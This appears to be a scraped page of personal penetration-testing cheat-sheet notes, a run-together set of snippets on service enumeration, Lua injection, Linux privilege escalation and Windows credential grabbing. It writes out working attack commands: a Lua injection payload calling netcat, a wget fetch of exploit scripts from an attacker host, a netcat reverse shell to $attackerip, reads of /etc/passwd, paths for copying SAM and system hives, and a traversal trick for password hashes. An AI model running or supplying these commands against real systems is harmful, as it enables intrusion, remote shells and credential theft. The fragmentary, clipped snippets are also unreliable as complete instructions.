Version 8 has an interesting vulnerability. Directory traversal with multiple/remote/14641.py reveals a SHA1 password hash. In the publicly available login page, the salt can be accessed and added to the hash:console.log(hex_hmac_sha1(document.loginform.salt.value, ‘2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03’));
Dumpzilla Extracts the content of a profile directory. Download the profile directory. See what we have:dumpzilla 84p8ofq6.default --Summary Use the modules to see details.
Enumeration Mandatory Enumerate with nmapnmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 $target Connect and get version informationtelnet $target 6697USER duperuser4242 0 * duperuser4242NICK duperuser4242VERSIONINFOHELP Optional
Example: # telnet $target 110 Trying 10.10.10.51… Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS root +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows ...
Enumeration Mandatory Grab bannertelnet $target 119 Enumerate with nmapnmap -p 119 --script nntp-ntlm-info $target Optional
See POP3.
Enumeration Mandatory Grab bannertelnet $target 110openssl s_client -connect $target:995 -crlf -quiet In case of issues, see the openssl article. Search for exploits. If you have credentials, log in and read the emails. Optional
Login Bevor login, convert username and password into base64. (!) Use telnet — nc sometimes does not work and does not return the server’s response! HELO mynameAUTH LOGINcm9vdAo= // username in base64334 Server reponds with base64 stringcm9vdAo= // password in base64235 ok // success
See SMTP article
Shows all process in a wide consoleps auxww sudo = doas
Logrotate exploit RCE until 12.8.1
Standard on port 9001. Default htauth user / 123
https://www.syhunt.com/en/index.php?n=Articles.LuaVulnerabilities Notes A comment can be done with //. Add this after an injectionindex?file=bla');os.execute('nc...')--
Prepare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Prepare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, execute it: LinPeas: ./linpeas.sh LinEnum: ./LinEnum.sh linux-smart-enumeration: ./lse.sh ‑l1 linux-exploit-suggester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh linuxprivchecker: ./linuxprivchecker.py Finally: Copy typescript file to the PentestManager!
Additional ideas Environment exploitation Interpolation exploitation Prerequisites: Then, create a file in a directory which is names like parameters from the program. The program will interpret the filenames as arguments. Example: Assume there is a call like this in a script: tar czf /tmp/backup.tar.gz * The script is in /home/peter and because we are this…
If your console is narrow, widen it at the beginning: stty rows 50 cols 200 Consider to directly spawn another reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enumeration about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…
Important notes Copy+paste For Linux: base64 r > r.b64 ... base64 --decode -i r.b64 > r.tar For Windows: base64 p64.exe | sed 's/^(.*)$/echo \1 >> b64/g' ... certutil -encode file.exe b64.txt certutil -decode b64.txt file.exe Alternative: python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))" ... python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))" Alternative: python -m base64 -e test > test.b64 ... python -m base64…
Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example how to add exceptions into the firewall via the command line from an administrator: C:\Windows\temp> netsh advfirewall firewall…
Grab the SAM and system file: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-) Run the credential retrievers from the script page.
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';